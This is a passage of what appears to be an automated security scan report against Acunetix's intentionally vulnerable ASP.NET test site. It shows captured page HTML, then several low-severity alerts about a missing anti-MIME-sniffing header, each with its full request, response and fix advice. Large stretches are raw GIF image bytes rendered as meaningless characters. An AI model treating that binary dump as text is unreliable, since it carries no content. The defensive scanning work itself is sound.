              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        10. GET http://testaspnet.vulnweb.com/images/comment-after.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (347 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-after.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "2c6507199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1957
          
          
          Response body (1957 bytes)
          GIF89aôÕÿÿÿ€`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâóìçòìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìù÷õöñìõðëùøõïèâøõñù÷öðéãíäÝ÷õñõñëûûùëâÙøõðùøöîäÝðèãîäÞéÞÕæÚÏíäÞéßÔûúùçÜÒ÷õðöðëçÛÑïéãëáÙëâØçÜÑ!ù,ôÿÀ@ŀ0
          C¢eXDN„Å0}§I¤ôIµ *ɨIT>§Çfж†ÕU¢¸\ñ~+ͣֈ¿Ö­c't^PZYPCKMherF^ŠNv[Zbxr_\H2fc“i…`¤MY\yUn•G”h‘O'‹VTl{kL[·Wz¬¤T¸di›c…Lƒ¡«¹e”T'¹¨}}cšLeyR»ÝiڎH­â¼ÕŸr’{CªTuËD
          "
          
          ð§@ …}þâã°¯à@!*PHA„½ƒ ª(ÈñGâë80#Ȃ@âË1ä~ø~tˆÒa@cܗ³ …ÿ?|\9r"É8#ò<HS⽃0Ê<À‚Š…S2‘âϝ:ïuÉ¦‚{â«ˆ3#ДoêĹvߨ†ýIMê“!ڑpGÆäHpèI½‚&(§B·/ˆØ/oÛ»-Ꜭùç³zµNTêsѝU¤T+—kÀŸ>ÿ%u©àê蟫%vݺé\
          è-Ž!(ǀ@óæ’/Àb¸óä†'WN`Áqï$xçÎÝz÷æÒ½/¿~½óñ!ÔcÞ]ùðöâíw¿<}õᕷ@|ï•]tÓ鷜wٍނÖ%Gà~¤À_vöWyåÙÇÿžxnÈ¡ˆÚ½ &ÞWžñ©HsNG
          ¢‡`v8]ƒÇag†Èm(ÞxÛgކ.vGcw	ޗށN6Bsæ59¢u¨ÓmǞvOòG$’!>6Jø¤†*V蠆ÎAWߐc¾éœr¤€g}ê¹GƒÊ@j(…n`袈"Z¨£‹2zh¤lÐ(¥“
          à(¢P
          	™V
          ª¢
          àÁ£¤
          Щ¦Ÿ>
          )£ŠB𪬮bJ«£–Æz(¨‰"zjª˜FJ뤲v°*­ºš*é¢\ª)±›‚Ú諅z`)«ª:;ë©Ø
          Pƒ®·
          [굅Öp걏v:ÿì²âB@n¯Ý.ún¥Ýþo¦ÃÊêÁ´Ï–Úï¡ÎvÊ-·¤"š,µ¬Z+ª›B+v
          쩘p°ýrªª ƒ>à@„²Ç
          DÁ
          4ðqÈ&G2Ê0; sÐ|2Í!¯ü±¸ŒòÉ${\sÉ&—œ2È*¯\rÍ(ƒ|³Ì<ˬ²Ð2‡,´É(\4ÏGGÝsÖE'­òÔ]m2Ï-{ýsÓI{ítÌ?kÍsÏ./}4ÍLÓ}rÕã,wÖc¿ŒuÊs×\õÇ k=¶Ç=/M3ÑFs]³ÏN'ÎôÌ=K=òØJ¿,5Ì)û|òÈ>®óÛ3#½sæ.ÍxèCK]¸ì6¿>ÿ2â*·ž5Ø"çŽùÍD³œ8Ö\ßMrñ6ã4Ú8yÎ-O­sãxCÝúÒ9gï5ǃ0|?Þ~øã—Ï@æþ÷°/>øò£Ÿúð¯o~ùÞ£ÿÿüƒß÷È÷>óáO|üc0‚ÈoLŸÿ8?F0|
          쟂ðyðõÛß÷H?V°ôà	ý§Bï±/…üúX ?
          ^0‚tßûØBê/…¬¡pށì 	;ˆ?!Öðˆ´!ÿFpD"±‚$_
          yÈÁþm‘ò{áÈ?&
          P}¡o¨DŠ<…8ÃæÿŒõã€	 HÀü8
          ü1-(@
           ?þ‹|d9I@úq’”t¤#%	HN.R‚$#)Iò‚œ$(¹IE“‹le IÉJþ”“œÀ
          þ¨IEÒҗ¶4dvIËT:2—\eILR™ŸLd*)Jj>ó—‘&%IyÌJž2’©ü¥/ÅùÈVÆ2’üc3‡yËc’ÀÎ´%*·™ÍQž¤´¥3yyMEjSŸéÌä2½¹OWj•ð<e:}II~ „§.]ùÍ[º²¦¬e.CIH`N²™Ë4¤HÑYÈ.¤³lh IªÊ\6’‘ÂòL=öHSšÒã¦8Í©NwÊӞúô§@
          ªP‡JÔ¢õ¨HMªR—ÊÔ¦:õ©PêRQ€  (xjM·ÊÕ®zõ«`
          «XÇJÖ²šõ¬hM«Z×ÊÖ¶ºõ­p«\çJ×®ÀxAfZ×¾úõ¯€
          ¬`KØÂö°ˆkf0Ø@‰¬d'KÙÊZö²˜ÍìVð‚ðU³ 
          ­hGKÚҚ֯œ…ìiWËÚÖºöµ°ìgcKÛÚÚö¶¸u­jû;
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        11. GET http://testaspnet.vulnweb.com/images/comment-before.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (348 bytes)
          GET http://testaspnet.vulnweb.com/images/comment-before.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:54 GMT
          Accept-Ranges: bytes
          ETag: "6a79f47099c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 1919
          
          
          Response body (1919 bytes)
          GIF89aôÕÿÿÿ€`@õðìðéâøôñíåÝüûùú÷õüúùîåÝúøõ÷ôñðèâòìçóìçòíçõñìóíçøôðíåÞúøöüúúüûúú÷ö÷ôðïéâîåÞöðìöñìù÷õõðëùøõïèâøõñù÷öðéãíäÝõñë÷õñûûùîäÝðèãùøöøõðîäÞûúù÷õðöðëíäÞïéã!ù,ôÿ@€pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒB‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬§H	±²	,	±²³¾Â	¾Æ³±ÆÇÁÁųϾµ¶¿ºÅ0µºµÆÓ¿Î½¸Ë¾à´½ÇÈ²ÓÆ(²Í½çñé¹îçÜÁì´Þ	¹$Ëtõ“Æ‹²jÊ#VïØ5}È´ã&/^EaàÈ& =uúHä
          ˜n›C†Öf¼–.à;…½¶äÈÌ_D—án©c<ÿŤÍ6²]8‰êÂȆ޵[óŒô—«êF\2}M5”ÖÕnì€ý*™R‘0` vˆ´jײu—A†¸#ÖªÍp·íÚ¾s3ÌÝk7.Ü´s+>¼Wí[½q·=Ì Å€úZfL7ñe¿™9³ÅŒ¸4lS+lX-濓A#†œZvâÚiïÒ­xnо¥EsfœW¯dܙӖ<ô€©O†Œ:6êÁ́K‡üðé¹§ƒ~ÝøñӈÍî«ÛsöÃ×וì:¹ðêiA€g,÷xsߔ¶`À
          8ðÀ‚
          "è@<à€	.aJ¨aFÐÿ€‡z¸`…	6ð†Fè ‚>áƒ*Ha…~(¡‚!rh"‡²Èá‚,B(a‚/šãŽ'ùâŒöx$Œšx!’)Þ8#’8n˜"‘&žˆa1zh£—þˆ ˆ\Ùd†BNØå‡?&¨ ‘M"xbº£‘¢ˆãœ6vx"
          6Ic†<j8!Š6ˆ¢š$fÙ¡Œ%Š¡Šv.Ú"or
          b¦
          ÊIá¥C*Éਂ†è¢…s
          id˜¾
          ¢ˆ*J)"Œ{Žxa$Þ)¦Ž—Ö8â°H@$«,Én ì³Ì2›¬´ÏB»lµl-¶×
           -³`A	ÝfK®³Ó
          àÿÁ´è
          ®·ãNK-´ÎB0¯½òr‹¯´ÚÖ»,¹Í2»n»ÜV‹ïµörð.¾þªkí³lë-Âߒí¼Éz -¼îJ|ïºð‚¿ûœîÆÉ¾°îÂӆ{ðÃ&C€rÀ!?;s¶!\s·ÛëÁŧô²‡2Èè2Û0Ƽ›/»ßRlòÐØ†Kðº”PtÁAƒën, 6!`‚¤°Í6h/€Á
          b·6b£6˜Ý·ô½÷ÞuóÍvÜ}/¸âŠ·-x‰c7ßi‹Íxà•ó¸ÞƒOž8à„/¹ã&À
          ·Ü™«Ý7ނÿ­zÝh®9+lŽÿwå‚S>8á•/øíºï|ގƒÞyñ–.äɏ½öîríBŽ÷õd¿ÍºÙwW~ûÙº.¸Þe®{ó|OÏ7ê–#nzûl‡Àváì_÷¥§=ºÜz/ž·û›ßù€ç:¸I z±s_î’G»Öå®mo£œøèÀ¶¥M+¸ å׸Á­.m @ (@ À.ð@…
          p!N¨Â’°'Œá]¨C*À†gxª †H\!p’0‰/,"cx&’°ˆ<lâRHB.Q‡TÔa]ÈÃ.¾ð„eŒ!.PÄ,ñŠOü!HÆ¢ÿq†`ôágÈÅzñ8¤€
          nØÃ*âQUäáÏhÆ&²‹à¢F¸D6’0ˆd,"«Ã1š‘Œ—<á#sXDú±ŽjÄ!%ŸÈÉ'v‰0|ãMéJÖñ…N$£
          5ÙʈÀ…),e&G™Åšñ—Æ<2'iJCþЎ:DfÏCTђžDdרÆÖQ‹
          ä3×xM&òœÍÌã')@HTÀ0€<
          ðNxZàñD@<å©OXÀÿÜg<ÿYOzúsŸµ*PÏ~ꓞð´ç>ÿ9Ï|ö“ŸhC-Px:4¢PèB+ÏyTž$hHúPœ¤œ
          å§AÊÏwÞ3Ÿ¨Gå©P›êÓ"ÝéA
          êP’z´¥å)BéÙ‰>ô§)C¡šÏ‚"´¤ÕhPç	TŠötŸ'¸©@šTŒžô¢ø<èXjR¬B d…hEúИîŸ/­@S¯Zֈ '(+USšÒ‡Ÿ-©?Ϛ؊V§ô̪cÑØ¥zÔ§'}§UÒ»Â3A;
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        12. GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (328 bytes)
          GET http://testaspnet.vulnweb.com/images/logo_acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (248 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:55 GMT
          Accept-Ranges: bytes
          ETag: "7228247199c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 2506
          
          
          Response body (2506 bytes)
          GIF89a2&æÿÿÿ€f@æÜÏá
          ???Í¿¬³¡ˆ¿¿¿„jEš„dâØÊàÕLJnJþþý†mIïïïÀ°šuRÚξ¦’vº©‘///ŸŸŸ___ÓÆµ­šOOO“|[Æ·£ÏÏϏßßß ‹m¯¯¯á	oooå1:æ:Bã$ä$-êU[èMTímráä*3øÊÌ큆æ/8ítzðŠâ!öÂÅüééâìdjò²´âçFMâêioò™üâãûÞßç@GèCJæBIö×Øï˜œé_eúæçó£§õ¼½ô¨¬â!ä(ã&áë`fòº½ùßáôÅÇùØÙñ £ï“˜ýïïýîïúììñ¦¨èHNñ­±÷ÓÔö²µüäåäýïðõÌÍò“˜üïïõ°³üíîï}‚!ù,2&ÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“–—˜™šƒ•žŸ ¡¢£¤¥¦§¨©ª«¬­­
          ³´µ¶·¸¹º»¼½¾¿À»
          ®ÅÆÇÈÉÊȰ²ÁÏÐÑÒÓÐÃËØÙÚÛÜ¡ÍÔàáâãÂÄÝçèéêŸßäî¶¿ïÒÖëûüýÆíøÞpÏ×A«™óǰá©p˜pÜÀ‚½
          ¨LŸÃ ? @2Â6ŠÁ]ü¥1å/ÉªÑтHi–ˆ	ɓT’FœŒåRÜJƒ‹ò‚Y,K™¢J•šƒEŒž”ø)‡‰*¥v4cÒ±¹˜¶“cª[·Dÿ„`e¨•Wu(Ñ+Ë«¥^\jW¥xKxª%sûÕ½›.ï__|wù}\+0*0
          k–J#ñ¾ÅûSÞY×äÑ,›Âlbóf.<«½Nt.  `Á·&XÐ ¨fù>ÜÖòZ+äd Â­Ó´>Ä`ü„\$PDÁ„	¿›÷R]*Ek×®“*áh$H jĉ$mP€Bå·_ èÇß'$€%”ø"€$]€Iž4˜I8Ø¡ˆ4˜@¡Œ°ß‚©Øv‹‡T€]
          \-pÝY\´À!؂އ4À›-4¢Áÿèè{£ÈߔN 1ʇ@Õ I¡`°A–@-˜ÀV¢ŒI(&I"„†`^€"‚Y€'izR×âI‹¨¸X‹FhðqLW“ÜIpÀpܘãŽÑ25z¢ÌCvÓ	àè¡Þ8Ë5
          PÞ£ã!êäzð½ð|±…b&&€a}g~R„øb’©+—ŸÔÉkЂo’Da´À^0"–!>H'wzbf¸˜é+‚ž:ˆu´,j¥@0ž¨ßµëä¤Bò8wG*—ªz§‘ ˆ,šjÁ³L'A½ñÂ(È«KÅjJ›©@CÿAÁÄ›ù(#‘ä­ž_2@€Øg~\™É˜¸&K@+Ë¢™m‚bæÈ´ùI.À¶Y+*/b*-ŸUu’=L)t‚tpËӝ~Êc
          ¨×.Ôñ’Ç0-óB\Î5©`aCa&´0ÊmV("ü)J	@1HÒÏe*«sÌòÊOÈ~’2£¤LnÏßþŒòV_n0ç*é0×dŸ5Ùù69µ¥ªæ6‘ð~ ˆ§·ì«Üé¸`ÍyZ“òÛ\x3¤071@QX
           ‹ ()´ß£¸Ü·ñb7„G„ÀôÔc(,òy‚BÉ"»R¹ê¸8:ÿ¼¹à;¨¾‰ær©Öðº^¾ 7Ýï¢R?û(:¦‚'.¸ƒ'5(LpܘKd^ò3æe/Ï֚²t=» 	\¢ÀPÀâ½£‘†;ïƒøLS¿ZX}K£¼&c¾Îé(iž»J1´¡b0„ùº@˜"xB…¹A7@
          3%ðÊÅ	‡AQD$(€§HÅ
          2æ$@Î^áA]ŒÐâ›ÅqÑB1¢#¶Èû¾&€ù™PÉa’ÕnÁ¤×æ~¢XAa¤€æF@
